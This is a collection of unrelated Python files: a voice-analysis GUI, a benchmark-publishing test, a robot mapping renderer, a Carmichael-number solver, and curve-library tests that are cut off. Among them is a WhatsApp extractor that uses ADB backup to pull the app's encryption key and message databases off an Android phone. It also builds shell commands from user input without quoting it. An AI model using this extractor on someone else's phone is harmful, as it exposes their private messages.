class VoicelabWizard(QMainWindow):
# triggers when the list of loaded files has changed with the active list of files
on_files_changed = pyqtSignal(list)
# triggers when a setting is changed with the list of active settings for the respective function
on_settings_changed = pyqtSignal(dict)
# triggers when the list of active functions is changed with the list of active functions
on_functions_changed = pyqtSignal(dict)
# triggers when the pipeline is done processing all of the files with the results
on_processing_completed = pyqtSignal(dict)
# triggers on each node finishing with the node name, the start, current, and end count of processed nodes
on_progress_updated = pyqtSignal(str, int, int, int)
def __init__(self):
super().__init__()
# set the icon in the corner of the window
self.setWindowIcon(QIcon('favicon.ico'))
# signals are created once and passed into each tab
# TODO: this may be possible using a singleton class or some other OOP way
# Puts all signals into a dictionary that's loaded into each tab
self.voicelab_signals = {
"on_files_changed": self.on_files_changed,
"on_settings_changed": self.on_settings_changed,
"on_functions_changed": self.on_functions_changed,
"on_processing_completed": self.on_processing_completed,
"on_progress_update": self.on_progress_updated,
}
        # Specifies the default size of the window;
        # it should be tall enough to show all the settings without a scrollbar
self.setMinimumSize(QSize(800, 880))
# Specifies the default title, simply change the string to change this
self.setWindowTitle("Voice Lab: Reproducible Automated Voice Analysis")
# This is the main widget in the main window
central_widget = QWidget(self)
self.setCentralWidget(central_widget)
# This set's up a grid layout for the central_widget
central_layout = QGridLayout(self)
central_widget.setLayout(central_layout)
# This sets up the tab layout for the central_layout
self.tabs = QTabWidget()
central_layout.addWidget(self.tabs)
# init: setup the base state of a controller, including a data model
self.data_controller = VoicelabController()
# links the progress updating on the data controller side to a pyqt signal that can be listened to anywhere
self.data_controller.progress_callback = lambda node, start, current, end: self.voicelab_signals[
"on_progress_update"
].emit(
node.node_id, start, current, end
)
# load all of the functions specified in the default settings file
for fn in available_functions:
self.data_controller.load_function(
fn, available_functions[fn], default=fn in default_functions
)
# add the Input Tab
self.tabs.addTab(
InputTab(
self.data_controller, self.voicelab_signals, self.tabs, parent=self
),
"Load Voices",
)
# add the Settings Tab
self.tabs.addTab(
SettingsTab(
self.data_controller, self.voicelab_signals, self.tabs, parent=self
),
"Settings",
)
# add the Output Tab
self.tabs.addTab(
OutputTab(
self.data_controller, self.voicelab_signals, self.tabs, parent=self
),
"Results",
)
# add the Voice Spectrum Tab
#self.tabs.addTab(
# ExperimentalTab(
# self.data_controller, self.voicelab_signals, self.tabs, parent=self
# ),
# "Results (Spectrum)",
#)
# add the Manipulation Tab
#self.tabs.addTab(
# ManipulationWindow(
# self.data_controller, self.voicelab_signals, self.tabs, parent=self
# ),
# "Voice Manipulations",
#)
# Experimental tab
#self.tabs.addTab(
# ExperimentalTab(
# self.data_controller, self.voicelab_signals, self.tabs, parent=self
# ),
# "Experimental", # Specify the Tab title here
#)
if __name__ == "__main__":
# boilerplate pyqt window creation
app = QApplication(sys.argv)
# setup stylesheet
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
# Create an instance of VoiceLab
w = VoicelabWizard()
# Show the GUI
w.show()
# Exit gracefully
sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
from os.path import join, exists
import six
from asv import config
from asv.commands.publish import Publish
RESULT_DIR = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'example_results'))
def test_publish(tmpdir):
tmpdir = six.text_type(tmpdir)
os.chdir(tmpdir)
conf = config.Config.from_json(
{'results_dir': RESULT_DIR,
'html_dir': join(tmpdir, 'html'),
'repo': 'https://github.com/spacetelescope/asv.git',
'project': 'asv'})
Publish.run(conf)
assert exists(join(tmpdir, 'html', 'index.html'))
assert exists(join(tmpdir, 'html', 'index.json'))
assert exists(join(tmpdir, 'html', 'asv.js'))
assert exists(join(tmpdir, 'html', 'asv.css'))
|
#!/usr/bin/env python3
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the state of an environment being explored by the robot.
This is a support class for the proximity_mapper example.
Includes a utility for rendering the state in OpenGL.
"""
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['ClearedTerritory', 'MapState', 'Wall', 'WallSegment']
from math import cos, sin, pi
import multiprocessing as mp
from typing import List
from anki_vector.util import Vector3
try:
from OpenGL.GL import (GL_AMBIENT, GL_BLEND, GL_DIFFUSE, GL_FILL, GL_FRONT, GL_FRONT_AND_BACK, GL_LIGHTING,
GL_LINES, GL_ONE_MINUS_SRC_ALPHA, GL_POINTS, GL_QUADS, GL_SHININESS, GL_SPECULAR, GL_SRC_ALPHA,
glBegin, glBlendFunc, glColor, glDisable, glEnable, glEnd, glMaterialfv, glNormal3f,
glPointSize, glPolygonMode, glVertex3f)
except ImportError as import_exc:
from anki_vector.opengl import opengl
opengl.raise_opengl_or_pillow_import_error(import_exc)
# Constants
#: Visually represent not just walls, but open/loose nodes, territories and navigation
#: points in the 3D Viewer.
RENDER_METADATA_OBJECTS = True
#: Display color of potential exploration targets in the 3D Viewer.
NODE_OPEN_RENDER_COLOR = [0.0, 1.0, 1.0, 0.75]
#: Display size (in pixels) of potential exploration targets in the 3D Viewer.
NODE_OPEN_RENDER_SIZE = 5.0
#: Display color of detected proximity collisions in the 3D Viewer.
#: These nodes will be collected into walls, and will only live long term if isolated
#: too far from any other contact points
NODE_CONTACT_RENDER_COLOR = [1.0, 0.0, 0.0, 0.75]
#: Display size (in pixels) of detected proximity collisions in the 3D Viewer.
NODE_CONTACT_RENDER_SIZE = 2.0
#: Display color of the rendered disc for the position the robot will next navigate to.
NAV_POINT_RENDER_COLOR = [0.0, 1.0, 0.0, 1.0]
#: Sections of the rendered disc for the position the robot will next navigate to.
NAV_POINT_RENDER_SECTIONS = 16
#: Display size of the rendered disc for the position the robot will next navigate to.
NAV_POINT_RENDER_SIZE = 25.0
#: Display color of the rendered disc for the territories the robot has already explored.
TERRITORY_RENDER_COLOR = [0.15, 0.6, 1.0, 1.0]
#: Sections of the rendered disc for the territories the robot has already explored.
TERRITORY_RENDER_SECTIONS = 32
#: Display color for the walls the robot has identified in the environment.
WALL_RENDER_COLOR = [1.0, 0.4, 0.1, 1.0]
#: Render height of the walls the robot has identified in the environment.
#: This value is purely cosmetic. As the proximity sensor is at a static height and
#: always faces forward, the robot has no way of detecting through this method how tall the
#: obstacles are, so the 100mm height was tuned to be similar to Vector in the viewer
#: rather than reflecting the objects in the environment.
WALL_RENDER_HEIGHT_MM = 100.0
class WallSegment:
"""Two points defining a segment of wall in the world
:param a: The first end of the wall segment expected to be in the xy plane
:param b: The second end of the wall segment expected to be in the xy plane
"""
def __init__(self, a: Vector3, b: Vector3):
self._a = a
self._b = b
# precalculate the normal for use in the render call
aToB = b - a
facing_vector = aToB.cross(Vector3(0, 0, 1))
self._normal = facing_vector.normalized
@property
def a(self) -> Vector3:
""":return: The first end of the wall segment."""
return self._a
@property
def b(self) -> Vector3:
""":return: The second end of the wall segment."""
return self._b
@property
def normal(self) -> Vector3:
""":return: The precalculated normal of the wall segment."""
return self._normal
class Wall:
"""A chain of WallSegments making up a continuous wall in 3d space
:param segment: The initial wall segment for this wall
"""
def __init__(self, segment: WallSegment):
self._vertices = [segment.a, segment.b]
def insert_head(self, vertex: Vector3):
"""Adds a new vertex to the front of the wall
:param vertex: The coordinates of the vertex being added to the front of the wall.
This point is expected to be near the current head, and in the same xy plane.
"""
self._vertices.insert(0, vertex)
def insert_tail(self, vertex: Vector3):
"""Adds a new vertex to the end of the wall
:param vertex: The coordinates of the vertex being added to the end of the wall.
This point is expected to be near the current tail, and in the same xy plane.
"""
self._vertices.append(vertex)
@property
def vertices(self) -> List[Vector3]:
""":return: All the vertices defining the ground vertices of the wall."""
return self._vertices
@property
def segments(self) -> List[WallSegment]:
""":return: Constructs and returns the WallSegments which make up this wall."""
result: List[WallSegment] = []
for i in range(len(self._vertices) - 1):
result.append(WallSegment(self._vertices[i], self._vertices[i + 1]))
return result
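    # e.g. a wall with vertices [p0, p1, p2] yields segments [WallSegment(p0, p1), WallSegment(p1, p2)]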
class ClearedTerritory:
"""A zone of space that the robot has already explored. These are used to
prevent the robot from populating new open nodes in finished areas.
Cleared Territories always exist in the x-y plane.
:param center: Centerpoint of the zone
:param radius: The size of the zone
"""
    def __init__(self, center: Vector3, radius: float):
self._center = center
self._radius = radius
@property
def center(self) -> Vector3:
""":return: The centerpoint of the territory."""
return self._center
@property
def radius(self) -> float:
""":return: The radius of the territory."""
return self._radius
class MapState:
"""A collection of walls, nodes, and territories defining the area the robot
is exploring.
"""
def __init__(self):
self._open_nodes: List[Vector3] = []
self._contact_nodes: List[Vector3] = []
self._walls: List[Wall] = []
self._cleared_territories: List[ClearedTerritory] = []
self._collection_active: bool = False
@staticmethod
def _set_color(color: List[float]):
"""Modifies the OpenGL state's active material with a specific color
used on the specular & diffuse channels, with limited ambient.
This function must be invoked inside the OpenGL render loop.
:param color: the color to use for the material
"""
glColor(color)
glMaterialfv(GL_FRONT, GL_AMBIENT, [color[0] * 0.1, color[1] * 0.1, color[2] * 0.1, 1.0])
glMaterialfv(GL_FRONT, GL_DIFFUSE, color)
glMaterialfv(GL_FRONT, GL_SPECULAR, color)
glMaterialfv(GL_FRONT, GL_SHININESS, 10.0)
@classmethod
def _render_points(cls, point_list: List[Vector3], size: float, color: List[float]):
"""Draws a collection of points in the OpenGL 3D worldspace.
This function must be invoked inside the OpenGL render loop.
:param point_list: the points to render in the view context
:param size: the size in pixels of each point
:param color: the color to render the points
"""
glPointSize(size)
cls._set_color(color)
glBegin(GL_POINTS)
for point in point_list:
glVertex3f(point.x, point.y, point.z)
glEnd()
@classmethod
def _render_circle(cls, center: Vector3, radius: float, sections: int, color: List[float]):
"""Draws a circle out of dashed lines around a center point in the x-y plane.
This function must be invoked inside the OpenGL render loop.
:param center: the center point of the rendered circle
:param radius: the size of the rendered circle
:param sections: the number of vertices used in the dashed line circle
:param color: the color to render the points
"""
cls._set_color(color)
glBegin(GL_LINES)
for i in range(sections):
theta = pi * 2.0 * float(i) / float(sections - 1)
glVertex3f(center.x + cos(theta) * radius,
center.y + sin(theta) * radius,
center.z)
glEnd()
@classmethod
def _render_wall(cls, wall: Wall, height: float, color: List[float]):
"""Draws walls out of quads in the 3D Viewer. The walls are drawn a
constant height above their ground-plane points, as a convention.
This function must be invoked inside the OpenGL render loop.
        :param wall: the wall to draw
        :param height: the height above the ground plane to extrude the wall quads
        :param color: the color to render the wall
"""
cls._set_color(color)
glBegin(GL_QUADS)
for wall_segment in wall.segments:
glNormal3f(wall_segment.normal.x, wall_segment.normal.y, wall_segment.normal.z)
glVertex3f(wall_segment.a.x, wall_segment.a.y, wall_segment.a.z)
glVertex3f(wall_segment.b.x, wall_segment.b.y, wall_segment.b.z)
glVertex3f(wall_segment.b.x, wall_segment.b.y, wall_segment.b.z + height)
glVertex3f(wall_segment.a.x, wall_segment.a.y, wall_segment.a.z + height)
glEnd()
@property
def open_nodes(self) -> List[Vector3]:
""":return: Points on the map which have no proximity detections between
themselves and the proximity scan origin point that found them.
These are safe points for the robot to drive to.
"""
return self._open_nodes
@open_nodes.setter
def open_nodes(self, open_nodes: List[Vector3]):
self._open_nodes = open_nodes
@property
def contact_nodes(self) -> List[Vector3]:
""":return: Points where an obstacle has been detected, but are too far
from other contacts to construct a wall from.
"""
return self._contact_nodes
@property
def walls(self) -> List[Wall]:
""":return: Chains of points denoting barriers detected by the proximity
sensor.
"""
return self._walls
@property
def cleared_territories(self) -> List[ClearedTerritory]:
""":return: Regions of space the robot has finished scanning. Any points
inside one of these regions can be considered accurate in terms of
detected boundaries.
"""
return self._cleared_territories
@property
def collection_active(self) -> bool:
""":return: Whether or not proximity data should currently be collected."""
return self._collection_active
@collection_active.setter
def collection_active(self, collection_active: bool):
self._collection_active = collection_active
def render(self, user_data_queue: mp.Queue = None):
"""Low level OpenGL calls to render the current state in an opengl_viewer. This
code will be executed inside the viewer's process.
Can be added to a viewer with the following code, telling the viewer to call this
whenever it redraws its geometry.
.. code-block:: python
robot.viewer_3d.add_render_call(my_map_state.render)
:param user_data_queue: The queue to read MapState messages from the main process.
        :type user_data_queue: multiprocessing.Queue
"""
try:
latest: MapState = user_data_queue.get(False)
self._open_nodes = latest._open_nodes # pylint: disable=protected-access
self._contact_nodes = latest._contact_nodes # pylint: disable=protected-access
self._walls = latest._walls # pylint: disable=protected-access
self._cleared_territories = latest._cleared_territories # pylint: disable=protected-access
self._collection_active = latest._collection_active # pylint: disable=protected-access
except mp.queues.Empty:
pass
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable(GL_BLEND)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glDisable(GL_LIGHTING)
if RENDER_METADATA_OBJECTS:
self._render_points(self._contact_nodes, NODE_CONTACT_RENDER_SIZE, NODE_CONTACT_RENDER_COLOR)
self._render_points(self._open_nodes, NODE_OPEN_RENDER_SIZE, NODE_OPEN_RENDER_COLOR)
# render the nav point open sample
if self._cleared_territories and self._open_nodes:
self._render_circle(self._open_nodes[0], NAV_POINT_RENDER_SIZE, NAV_POINT_RENDER_SECTIONS, NAV_POINT_RENDER_COLOR)
for cleared_territory in self._cleared_territories:
self._render_circle(cleared_territory.center, cleared_territory.radius, TERRITORY_RENDER_SECTIONS, TERRITORY_RENDER_COLOR)
glEnable(GL_LIGHTING)
for wall in self._walls:
self._render_wall(wall, WALL_RENDER_HEIGHT_MM, WALL_RENDER_COLOR)
|
import sys
import math
# You might know Fermat's little theorem:
# if n is prime, then for any integer a, we have a^n ≡ a mod n,
# i.e. a^n and a have the same remainder in the euclidean division by n.
# There are numbers, called Carmichael numbers, that are not prime but for which the equality remains true for any integer a.
# For example, 561 is a Carmichael number because for any integer a, a^561 ≡ a mod 561. It is in fact the smallest Carmichael number.
# You have to tell if the given number is a Carmichael number or not. Beware, you might be given a prime number.
# Input
# A single number n.
# Output
# YES if n is a Carmichael number, or NO if it’s not.
# Additional notes found on Wikipedia (https://fr.wikipedia.org/wiki/Nombre_de_Carmichael):
# every Carmichael number is odd and cannot be a prime number.
# Testing whether a^n and a have the same remainder in the euclidean division by n
# amounts to testing (a**n) % n == (a % n).
# For every integer a coprime to n, n divides a^(n-1) - 1;
# "a coprime to n" means that the gcd of n and a is 1.
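# Worked example via Korselt's criterion (an equivalent characterization):
# 561 = 3 * 11 * 17 is squarefree, and 3-1, 11-1 and 17-1 (i.e. 2, 10 and 16)
# all divide 561-1 = 560, so 561 passes the Fermat test for every base a
# coprime to 561.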
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
def is_prime(n):
    if n < 2:
        return False
    # test divisors up to and including floor(sqrt(n))
    for i in range(2, int(math.sqrt(n)) + 1):
        if n % i == 0:
            return False
    return True
def pgcd(a, b):
    # Euclidean algorithm: the gcd is the last non-zero remainder
    while b != 0:
        a, b = b, a % b
    return a
def is_carmichael_number(n):
    # Every Carmichael number is odd and cannot be a prime number
    # (https://fr.wikipedia.org/wiki/Nombre_de_Carmichael)
    if n < 3 or is_prime(n) or n % 2 == 0:
        return False
    # Test whether a^n and a have the same remainder in the euclidean
    # division by n. For a coprime to n (pgcd(n, a) == 1) this amounts to
    # checking that n divides a^(n-1) - 1, i.e. that pow(a, n - 1, n) == 1;
    # modular exponentiation keeps this fast even for large n.
    for a in range(2, n):
        # If a is coprime to n but n does not divide a^(n-1) - 1,
        # n is not a Carmichael number
        if pgcd(n, a) == 1 and pow(a, n - 1, n) != 1:
            return False
    # If we arrive here, we have a Carmichael number
    return True
if __name__ == "__main__":
n = int(input())
answer = "YES" if is_carmichael_number(n) else "NO"
# Write an action using print
# To debug: print("Debug messages...", file=sys.stderr)
print(answer)
|
import os
import platform
import re
import shutil
import subprocess
import helpers.ADBDeviceSerialId as deviceId
import protect
from helpers.CustomCI import CustomInput, CustomPrint
# Detect OS
isWindows = False
isLinux = False
if platform.system() == 'Windows':
isWindows = True
if platform.system() == 'Linux':
isLinux = True
# Global variables
isJAVAInstalled = False
# Global command line helpers
tmp = 'tmp/'
helpers = 'helpers/'
bin = 'bin/'
extracted = 'extracted/'
tar = 'tar.exe'
if(isWindows):
adb = 'bin\\adb.exe -s '
else:
adb = 'adb -s '
tar = 'tar'
def main():
os.system('cls' if os.name == 'nt' else 'clear')
ShowBanner()
global isJAVAInstalled
isJAVAInstalled = CheckJAVA()
ADBSerialId = deviceId.init()
if(ADBSerialId):
sdPath = subprocess.getoutput(
adb + ADBSerialId + ' shell "echo $EXTERNAL_STORAGE"') or '/sdcard'
else:
sdPath = ''
ExtractAB(isJAVAInstalled, sdPath=sdPath,
ADBSerialId=ADBSerialId, callingFromOtherModule=False)
def CheckJAVA():
    try:
        JAVAVersion = re.search('(?<=version ")(.*)(?=")', str(subprocess.check_output(
            'java -version'.split(), stderr=subprocess.STDOUT))).group(1)
    except (subprocess.CalledProcessError, FileNotFoundError, AttributeError):
        # java is missing or the version string could not be parsed
        JAVAVersion = None
    isJAVAInstalled = bool(JAVAVersion)
    if (isJAVAInstalled):
        CustomPrint('Found Java installed on system. Continuing...')
        return isJAVAInstalled
else:
noJAVAContinue = CustomInput(
'It looks like you don\'t have JAVA installed on your system. Would you like to (C)ontinue with the process and \'view extract\' later? or (S)top? : ', 'red') or 'c'
if(noJAVAContinue.upper() == 'C'):
CustomPrint(
'Continuing without JAVA, once JAVA is installed on system run \'view_extract.py\'', 'yellow')
return isJAVAInstalled
else:
Exit()
def CleanTmp():
if(os.path.isdir(tmp)):
CustomPrint('Cleaning up tmp folder...', 'yellow')
shutil.rmtree(tmp)
def Exit():
print('\n')
CustomPrint('Exiting...')
os.system(
'bin\\adb.exe kill-server') if(isWindows) else os.system('adb kill-server')
quit()
def ExtractAB(isJAVAInstalled, sdPath='', ADBSerialId='', callingFromOtherModule=True):
if not (isJAVAInstalled):
CustomPrint('Can not detect JAVA on system.')
# move whatsapp.ab from tmp to user specified folder.
userName = CustomInput('Enter a name for this user. : ')
        os.mkdir(extracted) if not (os.path.isdir(extracted)) else CustomPrint(
            'Folder ' + extracted + ' already exists.', 'yellow')
os.mkdir(extracted + userName) if not (os.path.isdir(extracted + userName)
) else CustomPrint('Folder ' + extracted + userName + ' exists.')
os.rename(tmp + 'whatsapp.ab', extracted + userName + '/whatsapp.ab')
CustomPrint('Moved whatsapp.ab to ' + extracted + userName + ' folder. Size : ' +
str(os.path.getsize(extracted + userName + '/whatsapp.ab')) + ' bytes.')
CustomPrint('Run view_extract.py after installing Java on system.')
CleanTmp()
Exit()
if(not callingFromOtherModule):
        if(CustomInput('Have you already made whatsapp.ab and are just extracting it now? : ').upper() == 'Y'):
ListUserFolders()
print('\n')
userName = CustomInput(
'Enter a name of folder from above (case sensitive) : ') or 'user'
abPass = CustomInput(
'Enter same password which you entered on device when prompted earlier. : ')
if(os.path.isfile(extracted + userName + '/whatsapp.ab')):
try:
CustomPrint('Found whatsapp.ab in ' + extracted + userName + ' folder. Size : ' + str(
os.path.getsize(extracted + userName + '/whatsapp.ab')) + ' bytes.')
os.mkdir(tmp) if not (os.path.isdir(tmp)) else CustomPrint(
'Folder ' + tmp + ' already exists.', 'yellow')
os.system('java -jar ' + bin + 'abe.jar unpack ' + extracted +
userName + '/whatsapp.ab ' + tmp + 'whatsapp.tar ' + str(abPass))
CustomPrint('Successfully unpacked ' + extracted + userName + '/whatsapp.ab to ' +
tmp + 'whatsapp.tar. Size : ' + str(os.path.getsize(tmp + 'whatsapp.tar')) + ' bytes.')
TakingOutMainFiles(userName, sdPath, ADBSerialId)
except Exception as e:
CustomPrint(e, 'red')
else:
CustomPrint('Could not find whatsapp.ab in ' + extracted +
userName + ' folder, did you name your user properly?')
Exit()
if(os.path.isfile(tmp + 'whatsapp.ab')):
CustomPrint('Found whatsapp.ab in tmp folder. Continuing... Size : ' +
str(os.path.getsize(tmp + '/whatsapp.ab')) + ' bytes.')
userName = CustomInput(
'Enter a reference name for this user. : ') or 'user'
abPass = CustomInput(
'Enter same password which you entered on device when prompted earlier. : ')
try:
os.system('java -jar ' + bin + 'abe.jar unpack ' + tmp +
'whatsapp.ab ' + tmp + 'whatsapp.tar ' + str(abPass))
CustomPrint('Successfully unpacked ' + tmp + 'whatsapp.ab to ' + tmp +
'whatsapp.tar. Size : ' + str(os.path.getsize(tmp + 'whatsapp.tar')) + ' bytes.')
TakingOutMainFiles(userName, sdPath, ADBSerialId)
except Exception as e:
CustomPrint(e, 'red')
def ListUserFolders():
print('\n')
CustomPrint('Available user folders in extracted directory.')
print('\n')
allFolders = next(os.walk(extracted))[1]
if(len(allFolders) == 0):
CustomPrint('No folders found in ' + extracted + ' folder.', 'red')
Exit()
for folder in allFolders:
CustomPrint(folder)
def ShowBanner():
banner_path = 'non_essentials/banner.txt'
try:
banner = open(banner_path, 'r')
banner_content = banner.read()
CustomPrint(banner_content, 'green', ['bold'], False)
banner.close()
except Exception as e:
CustomPrint(e, 'red')
    CustomPrint('============ WhatsApp Key / Database Extractor for non-rooted Android ===========\n',
                'green', ['bold'], False)
def TakingOutMainFiles(userName, sdPath, ADBSerialId):
os.mkdir(extracted) if not (os.path.isdir(extracted)) else CustomPrint(
'Folder ' + extracted + ' already exists.', 'yellow')
os.mkdir(extracted + userName) if not (os.path.isdir(extracted + userName)
) else CustomPrint('Folder ' + extracted + userName + ' already exists.', 'yellow')
# If user folder already exists ask user to overwrite or skip.
    CustomPrint('Taking out main files in ' + tmp + ' folder temporarily.')
try:
bin = 'bin\\' if(isWindows) else ''
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/f/key')
os.replace('tmp/apps/com.whatsapp/f/key',
extracted + userName + '/key')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/msgstore.db')
os.replace('tmp/apps/com.whatsapp/db/msgstore.db',
extracted + userName + '/msgstore.db')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/wa.db')
os.replace('tmp/apps/com.whatsapp/db/wa.db',
extracted + userName + '/wa.db')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/axolotl.db')
os.replace('tmp/apps/com.whatsapp/db/axolotl.db',
extracted + userName + '/axolotl.db')
os.system(bin + tar + ' xvf ' + tmp + 'whatsapp.tar -C ' +
tmp + ' apps/com.whatsapp/db/chatsettings.db')
os.replace('tmp/apps/com.whatsapp/db/chatsettings.db',
extracted + userName + '/chatsettings.db')
CleanTmp()
        CustomPrint(
            'You should not leave these extracted databases and other files lying around in this folder; it is very insecure.')
createArchive = CustomInput(
'Would you like to create a password protected archive? (default y) : ') or 'y'
if(createArchive.upper() == 'Y'):
print('\n')
CustomPrint('Now an archive will be created in extracted folder and original files will be deleted. To later \'un-archive\' and access these files you need to run \'python protect.py\' from root directory of this project.', 'yellow')
protect.Compress(userName)
else:
print('\n')
CustomPrint('\aYour whatsapp database along with other files is in ' +
os.path.realpath(extracted + userName) + ' folder.', 'yellow')
print('\n')
CustomInput('Press any key to continue.')
# TODO issue #13 : Ask user to save to sdcard.
if(sdPath and ADBSerialId):
copyTosdCard = CustomInput(
'Copy msgstore.db file to phone? (y/n) default \'n\' : ') or 'n'
if(copyTosdCard.upper() == 'Y'):
os.system(adb + ADBSerialId + ' push ' + extracted +
userName + '/msgstore.db ' + sdPath + '/msgstore.db')
CustomPrint('Done copying msgstore.db to phone.')
try: # Open in explorer.
if(isWindows):
os.startfile(os.path.realpath(extracted + userName))
elif(isLinux):
os.system('xdg-open ' +
os.path.realpath(extracted + userName))
else:
os.system('open ' + os.path.realpath(extracted + userName))
        except Exception:
            # opening the folder is best-effort only
            pass
except Exception as e:
CustomPrint(e, 'red')
CleanTmp()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import pytest
import numpy as np
from skcurve import Curve, Point, Axis
@pytest.mark.parametrize('data, size, ndim, dtype', [
([], 0, 2, np.int32),
(np.array([]), 0, 2, np.int32),
(np.array([], ndmin=2), 0, 2, np.int32),
(([1, 2, 3, 4, 5], [1, 2, 3, 4, 5]), 5, 2, np.float64),
(([1, 2], [1, 2], [1, 2]), 2, 3, np.float32),
(([1], [1], [1], [1]), 1, 4, np.int32),
(Curve([[1, 2, 3], [4, 5, 6]]), 3, 2, np.int32),
    (np.array([[1, 2], [4, 5], [7, 8]], dtype=np.float64), 3, 2, np.float64)
])
def test_construct(data, size, ndim, dtype):
curve = Curve(data, dtype=dtype)
assert len(curve) == size
assert curve.size == size
assert curve.ndim == ndim
assert curve.dtype == dtype
@pytest.mark.parametrize('data, ndmin, size, ndim', [
([], None, 0, 2),
([], 3, 0, 3),
(np.array([]), 4, 0, 4),
(([1, 2, 3, 4], [1, 2, 3, 4]), 3, 4, 3),
(Curve([[1, 2, 3, 4], [1, 2, 3, 4]]), 3, 4, 3),
(([1, 2, 3, 4, 5], [1, 2, 3, 4, 5]), None, 5, 2),
])
def test_construct_ndmin(data, ndmin, size, ndim):
curve = Curve(data, ndmin=ndmin)
assert curve.size == size
assert curve.ndim == ndim
def test_from_points():
"""Tests creating the instance of 'Curve' class from points
"""
points = [
Point([1, 5, 9]),
Point([2, 6, 10]),
Point([3, 7, 11]),
Point([4, 8, 12]),
]
points_array = np.array(points)
curve = Curve(points_array, axis=0)
assert curve.size == 4
assert curve.ndim == 3
assert curve.data == pytest.approx(points_array)
@pytest.mark.parametrize('curve_data', [
[],
[[], [], []],
])
def test_bool(curve_data):
curve = Curve(curve_data)
assert not curve
@pytest.mark.parametrize('curve_data1, curve_data2', [
([(1, 2, 3, 4), (5, 6, 7, 8)], [(1, 2, 3, 4), (5, 6, 7, 8)]),
([], []),
([[], []], [[], []]),
])
def test_eq(curve_data1, curve_data2):
assert Curve(curve_data1) == Curve(curve_data2)
@pytest.mark.parametrize('curve_data', [
[[1, 2, 3], [5, 6, 7]],
[[2, 3, 4, 5], [6, 7, 8, 9]],
[],
[[], []],
])
def test_ne(curve_data):
curve1 = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
curve2 = Curve(curve_data)
assert curve1 != curve2
def test_reverse():
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve.reverse() == Curve([(4, 3, 2, 1), (8, 7, 6, 5)])
def test_reverse_parametric():
t = np.linspace(0, np.pi, 10)
x = np.cos(t)
y = np.sin(t)
curve = Curve([x, y], tdata=t)
reversed_curve = curve.reverse()
assert reversed_curve == Curve([x[::-1], y[::-1]])
assert reversed_curve.t == pytest.approx(np.linspace(np.pi, 0, 10))
@pytest.mark.parametrize('point_data', [
[1, 5],
[2, 6],
[4, 8],
[3, 7],
])
def test_contains_point(point_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert Point(point_data) in curve
@pytest.mark.parametrize('curve_data', [
[[1, 2], [5, 6]],
[[2], [6]],
[[2, 3], [6, 7]],
[[1, 2, 3], [5, 6, 7]],
[[2, 3, 4], [6, 7, 8]],
[[3, 4], [7, 8]],
[[1, 2, 3, 4], [5, 6, 7, 8]],
])
def test_contains_curve(curve_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert Curve(curve_data) in curve
@pytest.mark.parametrize('data', [
10,
Point([10, 20]),
Curve([[10, 20], [30, 40]]),
])
def test_not_contains(data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert data not in curve
@pytest.mark.parametrize('point_data, start, stop, expected_index', [
([1, 5], None, None, 0),
([3, 7], 1, None, 2),
([2, 6], None, None, 1),
([2, 6], 2, None, 4),
([4, 8], None, 4, 3),
])
def test_index(point_data, start, stop, expected_index):
curve = Curve([(1, 2, 3, 4, 2), (5, 6, 7, 8, 6)])
assert curve.index(Point(point_data), start, stop) == expected_index
@pytest.mark.parametrize('point_data, expected_count', [
([0, 0], 0),
([1, 5], 1),
([3, 7], 2),
([2, 6], 3),
([4, 8], 1),
])
def test_count(point_data, expected_count):
curve = Curve([(1, 2, 3, 4, 2, 3, 2), (5, 6, 7, 8, 6, 7, 6)])
assert curve.count(Point(point_data)) == expected_count
@pytest.mark.parametrize('index, expected_data', [
(0, [1, 5]),
(1, [2, 6]),
(-1, [4, 8]),
(-2, [3, 7]),
])
def test_getitem_point(index, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve[index] == Point(expected_data)
@pytest.mark.parametrize('indexer, expected_data', [
(slice(None, 2), [(1, 2), (5, 6)]),
(slice(1, 3), [(2, 3), (6, 7)]),
(slice(-2, -1), [(3,), (7,)]),
(slice(-2, None), [(3, 4), (7, 8)]),
(slice(None), [(1, 2, 3, 4), (5, 6, 7, 8)]),
([0, 2, 3], [(1, 3, 4), (5, 7, 8)]),
(np.array([0, 2, 3]), [(1, 3, 4), (5, 7, 8)]),
([True] * 4, [(1, 2, 3, 4), (5, 6, 7, 8)]),
([False] * 4, []),
])
def test_getitem_curve(indexer, expected_data):
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)])
assert curve[indexer] == Curve(expected_data)
def test_getitem_curve_parametric():
tdata = [0, 1, 2, 3]
curve = Curve([(1, 2, 3, 4), (5, 6, 7, 8)], tdata=tdata)
sub_curve = curve[::2]
assert sub_curve.t == pytest.approx(np.array(tdata[::2]))
@pytest.mark.parametrize('indexer', [
(1, None),
(2, slice(None)),
(),
(slice(None),),
